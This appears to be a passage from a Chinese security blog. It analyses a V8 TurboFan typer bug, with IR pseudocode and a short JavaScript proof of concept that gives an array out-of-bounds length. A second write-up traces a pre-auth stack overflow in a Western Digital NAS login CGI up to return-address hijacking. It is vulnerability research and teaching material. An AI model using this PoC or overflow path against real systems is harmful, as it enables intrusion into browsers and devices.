  Type const lhs_type = TypeOf(node->InputAt(0));
  Type const rhs_type = TypeOf(node->InputAt(1));
  // Regular number comparisons in JavaScript generally identify zeros,
  // so we always pass kIdentifyZeros for the inputs, and in addition
  // we can truncate -0 to 0 for otherwise Unsigned32 or Signed32 inputs.
  if (lhs_type.Is(Type::Unsigned32OrMinusZero()) &&
      rhs_type.Is(Type::Unsigned32OrMinusZero())) {
    // => unsigned Int32Cmp
    VisitBinop(node, UseInfo::TruncatingWord32(),
                  MachineRepresentation::kBit);
    if (lower()) ChangeOp(node, Uint32Op(node));
  } else if (lhs_type.Is(Type::Signed32OrMinusZero()) &&
             rhs_type.Is(Type::Signed32OrMinusZero())) {
    // => signed Int32Cmp
    VisitBinop(node, UseInfo::TruncatingWord32(),
                  MachineRepresentation::kBit);
    if (lower()) ChangeOp(node, Int32Op(node));
  } else {
    // => Float64Cmp
    VisitBinop(node, UseInfo::TruncatingFloat64(kIdentifyZeros),
                  MachineRepresentation::kBit);
    if (lower()) ChangeOp(node, Float64Op(node));
  }
  return;
}

Exploit

array.shift trick

这个漏洞的原理至此已经分析清楚了，那么我们简单的来浏览一下这个漏洞的typer exploit trick。

1
2
3

//首先假设我们能让l的类型在typer阶段被推断成Range(-1,0)
let arr = new Array(l);
arr.shift();

TFBytecodeGraphBuilder

TFInlining

#81也就是array.shift将被Reduce成这些节点，我们重点关注StoreField[+12]即可，因为这代表的是重新为array的length字段赋值。

这部分IR对应的伪代码如下，摘自zer0con PPT原文。

/* JSCallReducer::ReduceArrayPrototypeShift */
let length = LoadField(arr, kLengthOffset); if (length == 0) {
    return;
} 
else {
    if (length <= 100) { 
        DoShiftElementsArray(); // Don't care 
        /* Update length field */
        let newLen = length - 1; 
        StoreField(arr, kLengthOffset, newLen);
    } 
    else /* length > 100 */ {
        CallRuntime(ArrayShift);
    } 
}

如果关注IR图的话，关注下面这部分就行了，可以看出先LoadField[+12]，然后对其减1，再StoreField[+12]回去。

TFTypedLowering

如图就是#JSCreateArray在TypedLowering phase被reduce后的IR。

伪代码如下:

// JSCreateLowering::ReduceJSCreateArray 
// JSCreateLowering::ReduceNewArray 
let limit = kInitialMaxFastElementArray; // limit : NumberConstant[16380]
// len : Range(-1, 0), real: 1
let checkedLen = CheckBounds(len, limit); // checkedLen : Range(0, 0), real: 1
let arr = Allocate(kArraySize); 
StoreField(arr, k[Map|Prop|Elem]Offset, ...);
StoreField(arr, kLengthOffset, checkedLen);

TFLoadElimination

有趣的是将上面这些reduce后的结果连起来看，会发现对length先Store，再Load，再减去一个-1，再Store，这是不是过于冗杂了呢，v8对其会进行一定的优化。

篇幅所限，略去不表，以后有空我再单独写一篇讲LoadElimination的漏洞的文章，总之最终优化后，首先会直接将#154 CheckBounds作为#133 NumberSubtract的左值输入。

然后由于之前Typer分析的时候CheckBounds的范围是(0,0)，这显然是一个常量，而#44也是一个常量1，所以#133在其输入更新后，它的type也被更新成了-1，随后就被常量折叠掉，于是最终得到的IR图如下。

最终伪代码如下:


let limit = kInitialMaxFastElementArray; // limit : NumberConstant[16380]
// len : Range(-1, 0), real: 1
let checkedLen = CheckBounds(len, limit); // checkedLen : Range(0, 0), real: 1
let arr = Allocate(kArraySize); 
StoreField(arr, kMapOffset, map); 
StoreField(arr, kPropertyOffset, property); 
StoreField(arr, kElementOffset, element);
StoreField(arr, kLengthOffset, checkedLen);

let length = checkedLen;
// length: Range(0, 0), real: 1
if (length != 0) {
    if (length <= 100) {
        DoShiftElementsArray(); 
        /* Update length field */
        StoreField(arr, kLengthOffset, -1); 
    } 
    else /* length > 100 */ 
    {
        CallRuntime(ArrayShift);
    }
}

事实上到目前为止一切就比较清晰了，只要我们能让length通过CheckBounds的检查，并且其值不等于0且小于等于100，就能在arr.shift之后让arr的length被置为-1，即0xffffffff，就实现arr的越界读写了。

最终的oob poc

function foo(a) {
  var y = 0x7fffffff;
  if (a == NaN) y = NaN; 
  if (a) y = -1;
  let z = (y + 1) + 0;
  let l = 0 - Math.sign(z);
  let arr = new Array(l);
  arr.shift();
  return arr;
}
%PrepareFunctionForOptimization(foo);
foo(true);
%OptimizeFunctionOnNextCall(foo);
print(foo(false).length);

事实上很有趣的一件事情是:

Retype前后的NumberSign的范围都是(0,1)，let l = 0 - Math.sign(z)在Retype前后的范围都是(-1,0)，没有变化。
补丁前后，影响的也只是let z = (y + 1) + 0的范围从(0, 2147483647)，变成了(0, 2147483648)，补丁前后不影响NumberSign的范围，所以也不会影响CheckBounds的范围，也就不会影响array.shift部分生成的IR。

补丁前:
补丁后:

所以无论补丁前还是补丁后，上面array.shift部分生成的IR都没有变化。
那么难道补丁之后，我们还可以执行到StoreField(arr, kLengthOffset, -1);,从而得到OOB吗？毕竟这部分代码都还在，它没有变化。

显然不可能，事实上补丁影响到的是对NumberSign的lower，它会根据以下逻辑来计算出是-1还是1。

Int32Add...
if ChangeInt32ToFloat64 < 0:
    Select -1
else:
    Select 1

在补丁前，Int32Add(0x7fffffff, 1)之后ChangeInt32ToFloat64得到的是-0x80000000,显然小于0，得到-1，然后带入let l = 0 - Math.sign(z)运算得到length为1，于是可以通过CheckBounds的检查，最后实现OOB。

但若是在补丁后，该伪代码将变成

Int32Add...
if ChangeUInt32ToFloat64 < 0:
    Select -1
else:
    Select 1

于是在补丁后，Int32Add(0x7fffffff, 1)之后ChangeUInt32ToFloat64得到的是0x80000000，显然大于0，得到1，然后计算出的length是-1，显然不能通过CheckBounds的检查，所以即使有可以导致OOB的分支在，也无法执行进去。

Other

Int32Add从哪来

补丁前后SpeculativeSafeIntegerAdd都会被lower到Int32Add，这部分逻辑其实在这里:

if (lower()) {
  if (truncation.IsUsedAsWord32() ||
      !CanOverflowSigned32(node->op(), left_feedback_type,
                           right_feedback_type, type_cache_,
                           graph_zone())) {
    ChangeToPureOp(node, Int32Op(node));
  } else {
    ChangeToInt32OverflowOp(node);
  }
}

注意truncation.IsUsedAsWord32()，只要满足这个条件，就会生成Int32Op，而要满足这个条件，目前看add | 0或者add +- 0这种都可以产生截断到word32。

如何产生SpeculativeSafeIntegerAdd节点

事实上如果从poc里去掉下面这句就不会创建出SpeculativeSafeIntegerAdd节点了，这是因为v8的启发式JIT在收集执行信息的时候，在进行add的时候，发现y + 1始终是进行的SignedSmall的add，所以会创建出SpeculativeSafeIntegerAdd。

如果没有这句，那么显然y + 1不可能是在SignedSmall范围内计算了，就会生成NumberAdd节点，也就不会走到存在漏洞的路径。

1	if (a) y = -1;// The next condition holds only in the warmup run. It leads to Smi (SignedSmall) feedback being collected for the addition below.

参考链接

十分感谢刘耕铭精彩的分享:)

Western Digital My Cloud Pro系列PR4100 NAS认证前RCE漏洞分析与利用

2021-01-31T06:07:55.273Z

sakuraの从零开始のIoT漏洞挖掘系列(一): Western Digital My Cloud Pro系列PR4100 NAS认证前RCE漏洞分析与利用

简述

本文主要是对crowdstrike团队的pwn2own-tale-of-a-bug-found-and-lost-again文章进行学习，并梳理漏洞模式和探究漏洞利用方法，因为笔者手上没有这款固件，如果有人手上有或者用qemu仿真出来了，可以自己调试一下。

FIRMWARE

首先下载有漏洞的固件，该漏洞从2.31.204版本开始，一直在5.04.114版本修复，跨度长达一年，还是十分值得学习的。
https://downloads.wdc.com/gpl/WDMyCloud_PR4100_GPL_v2.40.155_20200713.tar.gz

攻击面枚举

因为是从零开始的IoT漏洞挖掘，从本篇开始我们首先讲述一下，在开始挖掘漏洞之前，我们需要做什么。第一件事就是要枚举攻击面，即这个目标它起了哪些服务，然后哪些服务是从外网可以访问。
一般可以用Netstat来看这些东西。

netstat -tulpn
- -t tcp
- -u udp
- -l listening, Show only listening sockets.
- -n Show numerical addresses instead of trying to determine symbolic host, port or user names.
- -p Show the PID and name of the program to which each socket belongs.

root@MyCloudPR4100 root # netstat -tulpn
Active Internet connections (only servers)
Proto Local Address           Foreign Address State  PID/Program name
tcp   0.0.0.0:443             0.0.0.0:*       LISTEN 3320/httpd         
tcp   127.0.0.1:4700          0.0.0.0:*       LISTEN 4131/cnid_metad
tcp   0.0.0.0:445             0.0.0.0:*       LISTEN 4073/smbd
tcp   192.168.178.31:49152    0.0.0.0:*       LISTEN 3746/upnp_nas_devic
tcp   0.0.0.0:548             0.0.0.0:*       LISTEN 4130/afpd
tcp   0.0.0.0:3306            0.0.0.0:*       LISTEN 3941/mysqld
tcp   0.0.0.0:139             0.0.0.0:*       LISTEN 4073/smbd
tcp   0.0.0.0:80              0.0.0.0:*       LISTEN 3320/httpd 
tcp   0.0.0.0:8181            0.0.0.0:*       LISTEN 1609/restsdk-server
tcp   0.0.0.0:22              0.0.0.0:*       LISTEN 2761/sshd
tcp6  :::445                  :::*            LISTEN 4073/smbd
tcp6  :::139                  :::*            LISTEN 4073/smbd
tcp6  :::22                   :::*            LISTEN 2761/sshd
udp   0.0.0.0:1900            0.0.0.0:*              3746/upnp_nas_devic
udp   0.0.0.0:24629           0.0.0.0:*              2076/mserver
udp   172.17.255.255:137      0.0.0.0:*              4077/nmbd
udp   172.17.42.1:137         0.0.0.0:*              4077/nmbd
udp   192.168.178.255:137     0.0.0.0:*              4077/nmbd
udp   192.168.178.31:137      0.0.0.0:*              4077/nmbd
udp   0.0.0.0:137             0.0.0.0:*              4077/nmbd
udp   172.17.255.255:138      0.0.0.0:*              4077/nmbd
udp   172.17.42.1:138         0.0.0.0:*              4077/nmbd
udp   192.168.178.255:138     0.0.0.0:*              4077/nmbd
udp   192.168.178.31:138      0.0.0.0:*              4077/nmbd
udp   0.0.0.0:138             0.0.0.0:*              4077/nmbd
udp   0.0.0.0:30958           0.0.0.0:*              3808/apkg
udp   0.0.0.0:514             0.0.0.0:*              1958/syslogd
udp   127.0.0.1:23457         0.0.0.0:*              3985/wdmcserver
udp   127.0.0.1:46058         0.0.0.0:*              3746/upnp_nas_devic
udp   0.0.0.0:48299           0.0.0.0:*              2481/avahi-daemon:
udp   0.0.0.0:5353            0.0.0.0:*              2481/avahi-daemon:

一般看到httpd就可以确定这可能是使用了apache来做的服务端，所以再搜一下conf配置文件，一般以我的习惯会把每个conf文件都读一下，不过这里我们主要关注一下alias.conf和rewrite.conf

sakura@sakuradeMacBook-Pro:~/Desktop/WDMyCloud_PR4100_GPL_v2.40.155_20200713$ find . -name "*.conf"
./firmware/ramdisk/root/etc/mdev.conf
./firmware/ramdisk/root/etc/ez-ipupdate.conf
./firmware/ramdisk/root/etc/alert_email.conf
./firmware/ramdisk/root/etc/ld.so.conf
./firmware/ramdisk/root/etc/avahi/avahi-daemon.conf
./firmware/ramdisk/root/etc/netatalk/extmap.conf
./firmware/ramdisk/root/etc/nsswitch.conf
./firmware/module/crfs/web/config/default_lighttpd.conf
./firmware/module/crfs/web/config/php-fpm.conf
./firmware/module/crfs/web/apache2_dav/conf/httpd.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-languages.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-dav.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-autoindex.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-manual.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-multilang-errordoc.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-vhosts.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-userdir.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-info.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-ssl.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-default.conf
./firmware/module/crfs/web/apache2_dav/conf/extra/httpd-mpm.conf
./firmware/module/crfs/web/apache2/certconf/wdnas-rest-api.conf
./firmware/module/crfs/web/apache2/certconf/wdnas-rest-api-trusted.conf
./firmware/module/crfs/web/apache2/conf/sites-enabled/restsdk.conf
./firmware/module/crfs/web/apache2/conf/sites-enabled/wdnas-ui.conf
./firmware/module/crfs/web/apache2/conf/httpd.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-languages.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-dav.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-autoindex.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-manual.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-multilang-errordoc.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-vhosts.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-userdir.conf
./firmware/module/crfs/web/apache2/conf/extra/available/httpd-info.conf
./firmware/module/crfs/web/apache2/conf/extra/ports.conf
./firmware/module/crfs/web/apache2/conf/extra/httpd-default.conf
./firmware/module/crfs/web/apache2/conf/extra/wdapp_web.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/mime.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/flvx.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/env.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/dav_fs.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/unixd.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/autoindex.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/mime_magic.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/log_config.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/dir.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/rewrite.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/alpha_custom.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/security2.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/actions.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/cgi.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/deflate.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/alias.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/mpm_prefork.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/negotiation.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/logio.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/setenvif.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/ssl.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/headers.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/php5.conf
./firmware/module/crfs/web/apache2/conf/mods-enabled/xsendfile.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/modsecurity.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-949-BLOCKING-EVALUATION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-910-IP-REPUTATION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-901-INITIALIZATION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-950-DATA-LEAKAGES.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-921-PROTOCOL-ATTACK.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-913-SCANNER-DETECTION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-912-DOS-PROTECTION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/RESPONSE-980-CORRELATION.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
./firmware/module/crfs/web/apache2/conf/modsecurity/crs-setup.conf
./firmware/module/crfs/dbus-1/system.d/avahi-dbus.conf
./firmware/module/crfs/dbus-1/system.conf
./firmware/module/crfs/etc/smtp.conf
./firmware/module/crfs/etc/nas/wdnotifier.conf
./firmware/module/crfs/etc/nas/notify.d/wdmcserver.conf
./firmware/module/crfs/etc/nas/notify.d/wddispatcher.conf
./firmware/module/crfs/etc/apache2/sites-available/wdnas-rest-api.conf
./firmware/module/crfs/etc/apache2/sites-available/wdnas-ui.conf
./firmware/module/crfs/etc/apache2/sites-available/wdnas-rest-api-trusted.conf
./firmware/module/crfs/etc/apache2/conf.d/orionversion.conf
./firmware/module/crfs/etc/rsyslog.d/wdlog.conf
./firmware/module/crfs/etc/rsyslog.d/wddispatcher.conf
./firmware/module/crfs/default/syslog.conf
./firmware/module/crfs/default/mt-daapd.conf
./firmware/module/crfs/default/wdlog.conf
./firmware/module/crfs/default/dhcp6c.conf
./firmware/module/crfs/default/udhcpd.conf
./firmware/module/crfs/default/resolv.conf
./firmware/module/crfs/default/routeap.conf
./firmware/module/crfs/default/s3.conf
./firmware/module/crfs/default/snmpd.conf
./firmware/module/crfs/default/gogoc.conf
./firmware/module/crfs/apache2/sites-available/wdnas-rest-api.conf
./firmware/module/crfs/apache2/sites-available/wdnas-ui.conf
./firmware/module/crfs/apache2/conf.d/orionversion.conf
./firmware/module/crfs/files/ups/upsd.conf
./firmware/module/crfs/files/ups/upssched.conf
./firmware/module/crfs/files/ups/upsmon.conf
./firmware/module/crfs/files/ups/ups.conf
./firmware/module/crfs/files/syslog_rotate.conf
./firmware/module/crfs/files/mke2fs.conf
./firmware/module/crfs/files/syslog_dai

alias.conf
https://www.docs4dev.com/docs/zh/apache/2.4/reference/mod-mod_alias.html
1
ScriptAlias /cgi-bin/ /var/www/cgi-bin/
这句配置的含义是把web请求的url中，如果它访问的目录是/cgi-bin/，就重定向到/var/www/cgi-bin/目录下。
rewrite.conf
https://www.jianshu.com/p/103742cccaff

对于rewrite.conf，主要读懂RewriteCond和RewriteRule两个关键字的含义就行了。

RewriteCond起到的是过滤作用
以RewriteCond %{REMOTE_ADDR} !^127\.0\.0\.1$这句为例，如果%{REMOTE_ADDR}和!^127\.0\.0\.1$正则匹配，即REMOTE_ADDR不是来自localhost的话，就使用紧邻着的下一句RewriteRule来重定向web请求。
以RewriteRule ^(\w*).cgi$ /web/cgi_api.php?cgi_name=$1&%{QUERY_STRING} [L]这句为例，就是把所有访问xx.cgi文件的请求，都重定向到/web/cgi_api.php?cgi_name=xxx，即用cgi_api.php来分发请求，如果鉴权不通过，就不能访问该cgi文件。

这里的鉴权主要指的就是攻击者是否有普通用户登录的权限，也就是一般说的pre-auth和after-auth了。

我们主要关注的都是pre-auth的rce，所以从这个配置文件和从cgi_api.php里的逻辑可以看出，认证前能够访问的cgi文件只有webpipe.cgi和login_mgr.cgi，而前者内部也有鉴权，所以主要关注login_mgr.cgi

至此为止我们就分析出了攻击者易达的攻击面，如果要深挖的话还需要再读一下其他的配置文件，和ps -ef看看还开了哪些进程，能否通过httpd路由到。


RewriteEngine on
RewriteCond expr "%{REQUEST_URI} != '/xml/english.xml'"
RewriteCond expr "%{REQUEST_URI} != '/xml/lang.xml'"
RewriteRule ^/xml/(.*) /cgi-bin/webpipe.cgi
#RewriteRule /api/[0-9.]+/rest/(.*)\?(.*)$ /htdocs/api/rest/index.php?$2
#RewriteRule /api/[0-9.]+/rest/(.*)  /htdocs/api/rest/index.php

RewriteCond %{HTTP_HOST} ^(.*)\.(:\d+)?$
RewriteRule ^(.*)$ http://%1%2$1 [L,R=301]


RewriteCond %{REMOTE_ADDR} !^127\.0\.0\.1$
RewriteCond $1 !^abFiles$
RewriteRule ^(\w*).cgi$ /web/cgi_api.php?cgi_name=$1&%{QUERY_STRING} [L]
</Directory>
</IfModule>

漏洞分析

首先抓包看一下正常的请求包是什么样的，可以看出用户输入的密码其实是被base64之后再发往server端处理的

POST /cgi-bin/login_mgr.cgi HTTP/1.1
...
Cookie: PHPSESSID=058d44781ddc0be98f15233c8853476f; local_login=1
cmd=wd_login&username=admin&pwd=YWRtaW4%3D&port=

入口函数在cgiMain，该函数根据post请求里的cmd参数来选择使用哪个函数，这里我们主要看的就是wd_login函数

cgiMain

__int64 cgiMain()
{
  bool v0; // zf
  const char *v1; // rdi
  signed __int64 v2; // rcx
  char *v3; // rsi
  const char *v4; // rdi
  signed __int64 v5; // rcx
  char *v6; // rsi
  bool v7; // zf
  const char *v8; // rdi
  signed __int64 v9; // rcx
  char *v10; // rsi
  const char *v11; // rdi
  signed __int64 v12; // rcx
  char *v13; // rsi
  const char *v14; // rdi
  signed __int64 v15; // rcx
  char *v16; // rsi
  __int64 result; // rax
  char v18; // [rsp+0h] [rbp-28h]

  cgiFormString("cmd", &v18, 32LL);
  v0 = memcmp(&v18, "wd_login", 9uLL) == 0;
  if ( v0 )
  {
    wd_login();
    result = 0LL;
  }
  else
  {
    v1 = "ui_check_wto";
    v2 = 13LL;
    v3 = &v18;
    do
    {
      if ( !v2 )
        break;
      v0 = *v3++ == *v1++;
      --v2;

在我简单的处理了一下符号之后的伪代码如下。

int wd_login()
{
  char *pos_dbl_slash; // r14
  char *v1; // rsi
  char *v2; // rdx
  unsigned int login_successful; // er15
  FILE *v4; // rax
  FILE *v5; // r14
  int v6; // ecx
  unsigned int v7; // eax
  bool v8; // zf
  __int64 v9; // r14
  char *v10; // rsi
  FILE *v11; // rax
  FILE *v12; // r13
  __int64 v13; // r12
  __int64 v14; // rdx
  signed int v15; // er13
  unsigned int v16; // er12
  FILE *v17; // rax
  FILE *v18; // r12
  _BOOL4 v19; // ST10_4
  _BOOL4 v20; // ST08_4
  FILE *v21; // rbp
  _BOOL4 v22; // er8
  _BOOL4 v23; // er9
  struct passwd *v24; // rax
  signed __int64 v25; // rdx
  __int64 v26; // rdx
  FILE *v27; // rbp
  struct passwd *v28; // r14
  int v29; // er14
  FILE *v30; // r12
  FILE *v31; // rdi
  time_t v33; // [rsp+8h] [rbp-1200h]
  _BOOL4 v34; // [rsp+8h] [rbp-1200h]
  __int64 v35; // [rsp+10h] [rbp-11F8h]
  _BOOL4 v36; // [rsp+10h] [rbp-11F8h]
  __int64 v37; // [rsp+18h] [rbp-11F0h]
  __int64 v38; // [rsp+20h] [rbp-11E8h]
  __int64 v39; // [rsp+28h] [rbp-11E0h]
  char src[8]; // [rsp+30h] [rbp-11D8h]
  char dest[8]; // [rsp+40h] [rbp-11C8h]
  char username[8]; // [rsp+50h] [rbp-11B8h]
  __int64 v43; // [rsp+58h] [rbp-11B0h]
  __int64 v44; // [rsp+60h] [rbp-11A8h]
  __int64 v45; // [rsp+68h] [rbp-11A0h]
  __int64 v46; // [rsp+70h] [rbp-1198h]
  __int64 v47; // [rsp+78h] [rbp-1190h]
  __int64 v48; // [rsp+80h] [rbp-1188h]
  __int64 v49; // [rsp+88h] [rbp-1180h]
  char pwd_decoded[64]; // [rsp+90h] [rbp-1178h]
  char pwd_b64[256]; // [rsp+D0h] [rbp-1138h]
  char v52; // [rsp+1D0h] [rbp-1038h]
  int v53; // [rsp+260h] [rbp-FA8h]
  char v54; // [rsp+264h] [rbp-FA4h]
  char v55; // [rsp+3CFh] [rbp-E39h]
  char v56; // [rsp+3D0h] [rbp-E38h]
  char v57; // [rsp+5CFh] [rbp-C39h]
  char v58; // [rsp+5D0h] [rbp-C38h]
  char v59; // [rsp+7CFh] [rbp-A39h]
  char v60; // [rsp+7D0h] [rbp-A38h]
  char v61; // [rsp+9D0h] [rbp-838h]
  char v62; // [rsp+BD0h] [rbp-638h]
  char v63; // [rsp+DCFh] [rbp-439h]
  char s; // [rsp+DD0h] [rbp-438h]
  char v65; // [rsp+FCFh] [rbp-239h]
  char v66; // [rsp+FD0h] [rbp-238h]

  memset(pwd_b64, 0, sizeof(pwd_b64));
  memset(pwd_decoded, 0, sizeof(pwd_decoded));
  memset(&v52, 0, 0x200uLL);
  memset(&v56, 0, 0x200uLL);
  memset(&v58, 0, 0x200uLL);
  *(_QWORD *)username = 0LL;
  memset(&v60, 0, 0x200uLL);
  memset(&v61, 0, 0x200uLL);
  memset(&v62, 0, 0x200uLL);
  memset(&s, 0, 0x200uLL);
  memset(&v66, 0, 0x200uLL);
  v43 = 0LL;
  v44 = 0LL;
  v45 = 0LL;
  *(_QWORD *)src = 0LL;
  *(_QWORD *)dest = 0LL;
  v46 = 0LL;
  v47 = 0LL;
  v48 = 0LL;
  v49 = 0LL;
  v33 = time(0LL);
  cgiFormString("username", username, 32LL);
  cgiFormString("pwd", pwd_b64, 256LL);
  base64decode((u_char *)pwd_decoded, pwd_b64, 256);
  pos_dbl_slash = index(username, '\\');
  if ( !pos_dbl_slash )
  {
    if ( (unsigned int)is_username_allowed(username) )
    {
      login_successful = check_login(username, pwd_decoded);
      v15 = 0;
      v16 = 0;
    }

首先读取用户输入的username到username数组里，最大读取32个字节，读取pwd到pwd_b64数组里，最大读取256个字节
base64decode解密pwd_b64，将结果保存在pwd_decoded数组里，最大写入256个字节，但问题是pwd_decoded数组的size是64字节，所以会越界写入到pwd_b64数组里，但在这里不会影响程序的逻辑，因为pwd_b64在解密后就不会被用到。
is_username_allowed校验输入的用户名是否合法，该函数先将用户名里的大写字母转成小写，然后和一个全局字符串数组里的每个字符串比较，如果有任何一个匹配就返回0，代表非法，否则返回1，代表合法。
- 之所以这样比较是因为它将所有注册的用户的账号密码都写入到了/etc/shadow文件里，而这个文件里的root, anonymous...等用户是linux系统使用的，而不是给注册用户使用的。
然后将被溢出的数组pwd_decoded传给check_login函数。

__int64 __fastcall check_login(const char *username, const char *pwd_decoded)
{
  FILE *v2; // rbp
  struct passwd *v3; // rax
  struct passwd *v4; // rbx
  const char *v6; // rax
  char password_copy_shadow[80]; // [rsp+0h] [rbp-C8h]
  char password_copy_input[88]; // [rsp+50h] [rbp-78h]

  v2 = fopen64("/etc/shadow", "r");
  while ( 1 )
  {
    v3 = fgetpwent(v2);
    v4 = v3;
    if ( !v3 )
      break;
    if ( !strcmp(v3->pw_name, username) )
    {
      strcpy(password_copy_shadow, v4->pw_passwd);
      fclose(v2);
      strcpy(password_copy_input, pwd_decoded);

按行读取/etc/shadow里的数据，并解析成passwd结构体。
拷贝pw_passwd字段到栈上变量password_copy_shadow数组里
拷贝pwd_decoded到栈上变量password_copy_input数组里，因为pwd_decoded是一个写入溢出的字符串，其长度最大是192字节(base64算法，最大解密出来就是输入字符串的3/4长度)，而password_copy_input数组的size是88，所以在这个栈布局里就可以溢出到返回地址了。

如下是ida的stack layout视图，r代表返回地址，如图可以看到从password_copy_input数组到返回地址，一共是120个字节，而我们可以写入192个字节，所以可以劫持返回地址。

-00000000000000C8 ; D/A/*   : change type (data/ascii/array)
-00000000000000C8 ; N       : rename
-00000000000000C8 ; U       : undefine
-00000000000000C8 ; Use data definition commands to create local variables and function arguments.
-00000000000000C8 ; Two special fields " r" and " s" represent return address and saved registers.
-00000000000000C8 ; Frame size: C8; Saved regs: 0; Purge: 0
-00000000000000C8 ;
-00000000000000C8
-00000000000000C8 password_copy_shadow db 80 dup(?)
-0000000000000078 password_copy_input db 120 dup(?)
+0000000000000000  r              db 8 dup(?)
+0000000000000008
+0000000000000008 ; end of stack variables

漏洞模式

这个漏洞的模式就是写入的数据超出了数组本身的大小导致的写入越界，但实际造成栈溢出的地方是在更后面的strcpy的地方，相对来说其实比较隐蔽，strcpy这个函数会从源地址向目的地址拷贝数据，一直到遇到\0停止。

正常来说在往字符数组写入一个字符串的时候，都会把最后一个字节设置\0，但因为写入的越界，导致\0出现在了数组越界后的位置。

最终导致前面base64decode函数造成的写入越界向后传播，最终在某次strcpy的时候造成了栈溢出。

漏洞利用

正常来说栈溢出的漏洞利用只需要rop构造gadaget即可，但是对于64位架构的栈溢出来说，因为程序的装载基地址是0x400000，所以不考虑return to libc等情况，直接在程序体内来找合适的gadaget地址的话，不可避免的在写入地址的时候会遇到\x00，比如0000000000401D00这个地址，它的高位都是0。

所以在strcpy的时候，遇到高位的\x00就会被截断，所以在溢出的时候，最多就只能覆盖到返回地址，写入一个想到劫持到的地址，不能向后继续写入了。

如图可以看出，尽管我们溢出password_copy_input由于截断只能写到返回地址那个位置，进行一次gadaget。

